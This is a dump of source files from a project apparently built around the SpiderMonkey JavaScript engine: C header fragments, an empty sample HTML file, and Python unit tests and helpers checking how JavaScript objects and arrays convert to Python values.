50 | extern JSClass js_MathClass;
51 |
52 | extern JSObject *
53 | js_InitMathClass(JSContext *cx, JSObject *obj);
54 |
55 | JS_END_EXTERN_C
56 |
57 | #endif /* jsmath_h___ */
58 |
--------------------------------------------------------------------------------
/samples/2448.html:
--------------------------------------------------------------------------------
1 |
18 |
19 |
20 |
21 |
63 |
64 |
65 |
66 |
67 |
68 |
--------------------------------------------------------------------------------
/modules/honeyjs/tests/test-object.py:
--------------------------------------------------------------------------------
1 | # Copyright 2009 Paul J. Davis
2 | #
3 | # This file is part of the python-spidermonkey package released
4 | # under the MIT license.
5 | import t
6 |
7 | @t.cx()
8 | def test_object_repr(cx):
9 | t.eq(repr(cx.execute('var f = {"foo": "bar"}; f;')), "[object Object]")
10 |
11 | @t.cx()
12 | def test_object_attr_access(cx):
13 | t.eq(cx.execute('var f = {"foo": "bar"}; f;').foo, "bar")
14 |
15 | @t.cx()
16 | def test_object_item_access(cx):
17 | t.eq(cx.execute('var f = {"foo": "bar"}; f;')["foo"], "bar")
18 |
19 | @t.cx()
20 | def test_attribute_creation(cx):
21 | ret = cx.execute('var f = {"foo": "bar"}; f;')
22 | ret.pinky = "taking over."
23 | t.eq(cx.execute("f.pinky;"), "taking over.")
24 |
25 | @t.cx()
26 | def test_item_creation(cx):
27 | ret = cx.execute('var f = {"foo": "bar"}; f;')
28 | ret["pinky"] = "the world"
29 | t.eq(cx.execute("f.pinky;"), "the world")
30 |
31 | @t.cx()
32 | def test_js_mutation(cx):
33 | ret = cx.execute('var f = {"foo": "bar"}; f;')
34 | cx.execute('f["foo"] = 13;')
35 | t.eq(ret.foo, 13)
36 |
37 | @t.cx()
38 | def test_int_is_str_item(cx):
39 | ret = cx.execute('var f = {"2": "bar"}; f;')
40 | t.eq(ret["2"], "bar")
41 | t.eq(ret[2], "bar")
42 |
43 | @t.cx()
44 | def test_del_item_from_py(cx):
45 | ret = cx.execute('var f = {2: "bar"}; f;')
46 | del ret[2]
47 | t.eq(cx.execute('f[2];'), None)
48 |
49 | @t.cx()
50 | def test_del_attr_from_py(cx):
51 | ret = cx.execute('var f = {2: "bar"}; f;')
52 | delattr(ret, "2")
53 | t.eq(cx.execute("f[2]"), None)
54 |
55 | @t.cx()
56 | def test_array_repr(cx):
57 | t.eq(repr(cx.execute('[1, "foo", undefined];')), "1,foo,")
58 |
59 | @t.cx()
60 | def test_array_length(cx):
61 | t.eq(cx.execute('[1, "foo", undefined];').length, 3)
62 |
63 | @t.cx()
64 | def test_array_equality(cx):
65 | t.eq(cx.execute("[1,2,3];"), [1, 2, 3])
66 |
67 | @t.cx()
68 | def test_mapping_equality(cx):
69 | js = 'var d = {0: 0, "a": 1, 2: "b", "c": "d", "blah": 2.5}; d;'
70 | py = {0: 0, "a": 1, 2: "b", "c": "d", "blah": 2.5}
71 | t.eq(cx.execute(js), py)
72 |
73 | @t.cx()
74 | def test_nested_object_equality(cx):
75 | t.eq(
76 | cx.execute('["foo", 2, {"bar": 2.3, "spam": [1,2,3]}];'),
77 | [u"foo", 2, {u"bar": 2.3, u"spam": [1,2,3]}]
78 | )
79 |
--------------------------------------------------------------------------------
/modules/honeyjs/tests/t.py:
--------------------------------------------------------------------------------
1 | # Copyright 2009 Paul J. Davis
2 | #
3 | # This file is part of the python-spidermonkey package released
4 | # under the MIT license.
5 | import unittest
6 | import spidermonkey
7 | from spidermonkey import JSError
8 |
9 | class test(object):
10 | def __call__(self, func):
11 | def run():
12 | func(*self.args())
13 | run.func_name = func.func_name
14 | return run
15 | def args(self, func):
16 | raise NotImplementedError()
17 |
18 | class rt(test):
19 | def args(self):
20 | return (spidermonkey.Runtime(),)
21 |
22 | class cx(test):
23 | def args(self):
24 | rt = spidermonkey.Runtime()
25 | return (rt.new_context(),)
26 |
27 | class echo(test):
28 | def args(self):
29 | rt = spidermonkey.Runtime()
30 | cx = rt.new_context()
31 | echo = cx.execute("function(arg) {return arg;}")
32 | return (echo,)
33 |
34 | class glbl(test):
35 | def __init__(self, name, value):
36 | self.name = name
37 | self.value = value
38 | def args(self):
39 | rt = spidermonkey.Runtime()
40 | cx = rt.new_context()
41 | cx.add_global(self.name, self.value)
42 | return (cx, self.value)
43 |
44 | def eq(a, b):
45 | assert a == b, "%r != %r" % (a, b)
46 |
47 | def ne(a, b):
48 | assert a != b, "%r == %r" % (a, b)
49 |
50 | def lt(a, b):
51 | assert a < b, "%r >= %r" % (a, b)
52 |
53 | def gt(a, b):
54 | assert a > b, "%r <= %r" % (a, b)
55 |
56 | def isin(a, b):
57 | assert a in b, "%r is not in %r" % (a, b)
58 |
59 | def isnotin(a, b):
60 | assert a not in b, "%r is in %r" % (a, b)
61 |
62 | def has(a, b):
63 | assert hasattr(a, b), "%r has no attribute %r" % (a, b)
64 |
65 | def hasnot(a, b):
66 | assert not hasattr(a, b), "%r has an attribute %r" % (a, b)
67 |
68 | def raises(exctype, func, *args, **kwargs):
69 | try:
70 | func(*args, **kwargs)
71 | except exctype, inst:
72 | pass
73 | else:
74 | func_name = getattr(func, "func_name", "")
75 | raise AssertionError("Function %s did not raise %s" % (
76 | func_name, exctype.__name__))
77 |
78 | def is_js_object(obj):
79 | assert isinstance(obj, spidermonkey.Object), \
80 | "%r is not an instance of spdermonkey.Object." % obj
81 |
--------------------------------------------------------------------------------
/modules/honeyjs/spidermonkey/libjs/jsfile.h:
--------------------------------------------------------------------------------
1 | /* -*- Mode: C; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 4 -*-
2 | *
3 | * ***** BEGIN LICENSE BLOCK *****
4 | * Version: MPL 1.1/GPL 2.0/LGPL 2.1
5 | *
6 | * The contents of this file are subject to the Mozilla Public License Version
7 | * 1.1 (the "License"); you may not use this file except in compliance with
8 | * the License. You may obtain a copy of the License at
9 | * http://www.mozilla.org/MPL/
10 | *
11 | * Software distributed under the License is distributed on an "AS IS" basis,
12 | * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
13 | * for the specific language governing rights and limitations under the
14 | * License.
15 | *
16 | * The Original Code is Mozilla Communicator client code, released
17 | * March 31, 1998.
18 | *
19 | * The Initial Developer of the Original Code is
20 | * Netscape Communications Corporation.
21 | * Portions created by the Initial Developer are Copyright (C) 1998
22 | * the Initial Developer. All Rights Reserved.
23 | *
24 | * Contributor(s):
25 | *
26 | * Alternatively, the contents of this file may be used under the terms of
27 | * either of the GNU General Public License Version 2 or later (the "GPL"),
28 | * or the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
29 | * in which case the provisions of the GPL or the LGPL are applicable instead
30 | * of those above. If you wish to allow use of your version of this file only
31 | * under the terms of either the GPL or the LGPL, and not to allow others to
32 | * use your version of this file under the terms of the MPL, indicate your
33 | * decision by deleting the provisions above and replace them with the notice
34 | * and other provisions required by the GPL or the LGPL. If you do not delete
35 | * the provisions above, a recipient may use your version of this file under
36 | * the terms of any one of the MPL, the GPL or the LGPL.
37 | *
38 | * ***** END LICENSE BLOCK ***** */
39 |
40 | #ifndef _jsfile_h__
41 | #define _jsfile_h__
42 |
43 | #if JS_HAS_FILE_OBJECT
44 |
45 | #include "jsobj.h"
46 |
47 | extern JS_PUBLIC_API(JSObject*)
48 | js_InitFileClass(JSContext *cx, JSObject* obj);
49 |
50 | extern JS_PUBLIC_API(JSObject*)
51 | js_NewFileObject(JSContext *cx, char *bytes);
52 |
53 | extern JSClass js_FileClass;
54 |
55 | #endif /* JS_HAS_FILE_OBJECT */
56 | #endif /* _jsfile_h__ */
57 |
--------------------------------------------------------------------------------